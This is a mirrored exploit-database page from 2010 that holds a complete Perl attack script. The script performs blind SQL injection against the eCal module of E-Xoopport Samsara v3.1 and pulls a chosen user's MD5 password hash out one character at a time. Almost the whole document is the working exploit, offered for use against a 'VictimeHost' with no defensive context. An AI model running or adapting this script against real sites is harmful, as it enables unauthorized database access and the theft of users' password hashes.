Home / os / win7

[webapps / 0day] - E-Xoopport - Samsara <= v3.1 (eCal mod

Posted on 25 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>E-Xoopport - Samsara &lt;= v3.1 (eCal module) Blind SQL Injection Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 25 Sep 2010 | Exploit category: webapps / 0day | Exploit author: _mRkZ_ | Inj3ct0r exploit database' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>====================================================================== E-Xoopport - Samsara &lt;= v3.1 (eCal module) Blind SQL Injection Exploit ====================================================================== #!/usr/bin/perl # [0-Day] E-Xoopport - Samsara &lt;= v3.1 (eCal module) Remote Blind SQL Injection Exploit # Author/s: _mRkZ_, WaRWolFz Crew # Created: 2010.09.12 after 0 days the bug was discovered. # Greetings To: Dante90, Shaddy, StutM, WaRWolFz Crew # Web Site: www.warwolfz.org use strict; use warnings; use LWP::UserAgent; use HTTP::Cookies; use HTTP::Request::Common; $^O eq &#039;MSWin32&#039; ? system(&#039;cls&#039;) : system(&#039;clear&#039;); print &quot; E-Xoopport - Samsara &lt;= v3.1 (eCal Module) Remote Blind SQL Injection Exploit +---------------------------------------------------+ | Script: E-Xoopport | | Affected versions: 3.1 | | Bug: Remote Blind SQL Injection (eCal module) | | Author/s: _mRkZ_, WaRWolFz Crew | | Greetz: Dante90, Shaddy, StutM, WarWolFz Crew | | Web Site: www.warwolfz.org | +---------------------------------------------------+ | Warn: You must be able to access to &#039;eCal&#039; Module | +---------------------------------------------------+ &quot;; if (@ARGV != 4) { print &quot; Usage: perl expolit_name.pl &lt;VictimeHost&gt; &lt;YourNick&gt; &lt;YourPass&gt; &lt;NickToHack&gt; &quot;; exit; } my $host = $ARGV[0]; my $usr = $ARGV[1]; my $pwd = $ARGV[2]; my $anickde = $ARGV[3]; my $anick = &#039;0x&#039;.EncHex($anickde); print &quot;[!] Logging In... &quot;; my %postdata = ( uname =&gt; &quot;$usr&quot;, pass =&gt; &quot;$pwd&quot;, op =&gt; &quot;login&quot; ); my $cookies = HTTP::Cookies-&gt;new( autosave =&gt; 1, ); my $ua = LWP::UserAgent-&gt;new; $ua-&gt;agent(&quot;Mozilla 5.0&quot;); $ua-&gt;cookie_jar($cookies); my $req = (POST $host.&quot;/user.php&quot;, \%postdata); my $request = $ua-&gt;request($req); my $content = $request-&gt;content; if ($content =~ /&lt;h4&gt;Benvenuto su/i) { print &quot;[+] Logged in! &quot;; } else { print &quot;[-] Fatal Error: username/password incorrect? &quot;; exit; } print &quot;[!] Checking permissions... &quot;; $ua = LWP::UserAgent-&gt;new; $ua-&gt;agent(&quot;Mozilla 5.0&quot;); $req = $host.&quot;/modules/eCal/location.php?lid=1+AND+1=1&quot;; $ua-&gt;cookie_jar($cookies); $request = $ua-&gt;get($req); $content = $request-&gt;content; if ($content !~ /&lt;b&gt;Eventi nella località: &lt;/b&gt;/ig) { print &quot;[+] Fatal Error: Access denied &quot;; exit; } else { print &quot;[+] You have permissions &quot;; } print &quot;[!] Exploiting... &quot;; my $i = 1; my $pwdchr; while ($i != 33) { my $wn = 47; while (1) { $wn++; my $ua = LWP::UserAgent-&gt;new; $ua-&gt;agent(&quot;Mozilla 5.0&quot;); my $req = $host.&quot;/modules/eCal/location.php?lid=1+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),$i,1))=$wn&quot;; $ua-&gt;cookie_jar($cookies); my $request = $ua-&gt;get($req); my $content = $request-&gt;content; open LOGZZ, &#039;&gt;lol.html&#039;; print LOGZZ $content; close LOGZZ; if ($content !~ /&lt;b&gt;Eventi nella località: &lt;/b&gt;&lt;a href=&#039;localleve.php?lid=&#039;&gt;/ig) { my $cnt = $1; $pwdchr .= chr($wn); $^O eq &#039;MSWin32&#039; ? system(&#039;cls&#039;) : system(&#039;clear&#039;); PrintChars($anickde, $pwdchr); last; } } $i++; } print &quot; [!] Exploiting completed! &quot;; print &quot;Visit: www.warwolfz.org &quot;; sub PrintChars { my $anick1 = $_[0]; my $chars = $_[1]; print &quot; E-Xoopport - Samsara &lt;= v3.1 (eCal module) Remote Blind SQL Injection Exploit +---------------------------------------------------+ | Script: E-Xoopport | | Affected versions: 3.1 | | Bug: Remote Blind SQL Injection (eCal module) | | Author/s: _mRkZ_, WaRWolFz Crew | | Greetz: Dante90, Shaddy, StutM, WarWolFz Crew | | Web Site: www.warwolfz.org | +---------------------------------------------------+ | Warn: You must be able to access to &#039;eCal&#039; Module | +---------------------------------------------------+ [!] Logging In... [+] Logged in! [!] Checking permissions... [+] You have permissions [!] Exploiting... [+] &quot;.$anick1.&quot;&#039;s md5 Password: &quot;.$chars.&quot; &quot;; } sub EncHex { my $char = $_[0]; chomp $char; my @trans = unpack(&quot;H*&quot;, &quot;$char&quot;); return $trans[0]; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-25]</pre></body></html>

 

TOP